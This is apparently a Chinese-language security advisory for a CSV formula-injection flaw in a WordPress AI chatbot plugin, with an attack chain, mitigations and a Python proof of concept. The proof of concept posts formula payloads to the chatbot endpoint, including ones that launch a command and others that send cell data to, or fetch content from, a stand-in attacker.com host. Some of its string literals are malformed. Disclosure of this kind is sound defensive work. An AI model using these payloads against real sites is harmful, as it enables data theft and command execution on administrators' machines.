CVE-2025-11576 WordPress AI Chatbot插件CSV注入漏洞

漏洞信息

漏洞编号

CVE-2025-11576

漏洞类型

CSV注入

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AI Chatbot Free Models – Customer Support, Live Chat, Virtual Assistant WordPress插件

漏洞概述

AI Chatbot Free Models是WordPress平台上广受欢迎的客服聊天和虚拟助手插件。该插件在1.6.5及以下所有版本中存在严重的CSV注入漏洞。漏洞根源在于插件的'newcodebyte_chatbot_export_messages'函数对用户输入缺乏充分的输入验证和清理。攻击者无需任何认证即可利用此漏洞，通过聊天功能向系统注入包含恶意公式的字符串。当管理员或普通用户导出聊天记录为CSV文件并使用Microsoft Excel或其他电子表格软件打开时，嵌入的恶意公式将被自动执行，从而可能导致远程代码执行（RCE）。CSV注入（也称为公式注入或Excel公式注入）是一种被低估但危害严重的安全漏洞，攻击者利用电子表格软件的公式计算功能执行任意代码。此漏洞影响所有使用该插件的WordPress网站，需要立即采取修复措施。

技术细节

漏洞存在于WordPress AI Chatbot插件的消息导出功能中。具体来说，'newcodebyte_chatbot_export_messages'函数在处理用户通过聊天界面提交的消息时，未对特殊字符（如=、+、-、@等Excel公式触发字符）进行转义或过滤。当这些包含公式触发符的用户输入被写入CSV文件时，电子表格软件会在打开文件时尝试解析并执行这些公式。攻击者可以构造形如'=CMD|'/C calc'!A0'或'=HYPERLINK("http://attacker.com/steal?data="&A1)'的恶意载荷。当受害者打开导出的CSV文件时，Excel会执行公式代码，可能导致：1）启动系统命令解释器执行任意系统命令；2）将敏感电子表格数据发送到外部攻击者控制的服务器；3）在某些配置下执行恶意宏代码。攻击成功的关键在于用户交互——需要用户主动打开并查看导出的CSV文件，这使得该漏洞在社会工程攻击中特别有效。

攻击链分析

STEP 1

步骤1：侦察阶段

攻击者识别目标网站是否使用存在漏洞的AI Chatbot Free Models插件（版本<=1.6.5），通过检查页面源码或插件目录特征进行确认

STEP 2

步骤2：载荷注入

攻击者通过聊天界面或直接调用API接口，向系统提交包含恶意Excel公式的字符串（如=CMD|'/C calc'!A0），利用插件缺少输入过滤的漏洞

STEP 3

步骤3：载荷存储

恶意载荷被存储在WordPress数据库的消息表中，由于插件未对特殊字符进行转义，载荷以原始形式保存

STEP 4

步骤4：触发导出

具有管理权限的用户（如网站管理员）访问聊天记录导出功能，触发CSV文件生成，此时恶意公式被写入CSV文件

STEP 5

步骤5：用户交互

管理员或普通用户下载并使用Microsoft Excel、Google Sheets等软件打开CSV文件，电子表格软件会自动解析并执行公式

STEP 6

步骤6：代码执行

恶意公式被执行，可能导致系统命令执行（如弹出计算器或反弹Shell）、敏感数据外泄（如通过HYPERLINK函数将电子表格内容发送到攻击者服务器）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11576 CSV Injection PoC
# WordPress AI Chatbot Plugin <= 1.6.5
# Attack Vector: Inject malicious formula via chatbot message

import requests
import urllib.parse

target_url = "http://target-wordpress-site.com"

# Malicious payloads for CSV injection
# Payload 1: Command execution via Excel formula
payload_cmd = "=CMD|'/C calc'!A0"

# Payload 2: Data exfiltration via HYPERLINK
payload_exfil = "=HYPERLINK("http://attacker.com/steal?data="&A1)"

# Payload 3: Indirect command execution
payload_indirect = "=WEBSERVICE("http://attacker.com/shell.txt")"

# Step 1: Send malicious payload via chatbot
chatbot_endpoint = f"{target_url}/wp-json/ai-chatbot/v1/message"

headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

# Payload injection through chat message
data = {
    "message": payload_cmd,
    "session_id": "test_session_123"
}

print("[*] Sending malicious payload to chatbot...")
response = requests.post(chatbot_endpoint, json=data, headers=headers)

if response.status_code == 200:
    print("[+] Payload sent successfully")
    print(f"[+] Response: {response.text}")
else:
    print(f"[-] Failed to send payload: {response.status_code}")

# Step 2: Wait for admin to export messages
print("[*] Waiting for administrator to export CSV...")
print("[*] When admin opens the CSV, the formula will execute")

# Step 3: Check if export is accessible (unauthenticated)
export_endpoint = f"{target_url}/wp-admin/admin-ajax.php?action=newcodebyte_export_messages"
print(f"[*] Testing export endpoint: {export_endpoint}")

影响范围

AI Chatbot Free Models WordPress插件 <= 1.6.5

防御指南

临时缓解措施

作为临时缓解措施，可采取以下行动：1）暂时禁用AI Chatbot插件的消息导出功能；2）通过WAF规则拦截包含CSV公式元字符（=、+、-、@等开头）的请求；3）限制非管理员用户访问聊天记录导出功能；4）提醒用户在打开任何CSV文件前使用文本编辑器检查内容；5）考虑使用安全的CSV解析库（如python的csv模块配合适当的输入处理）。长期来看，应尽快升级到插件的最新安全版本。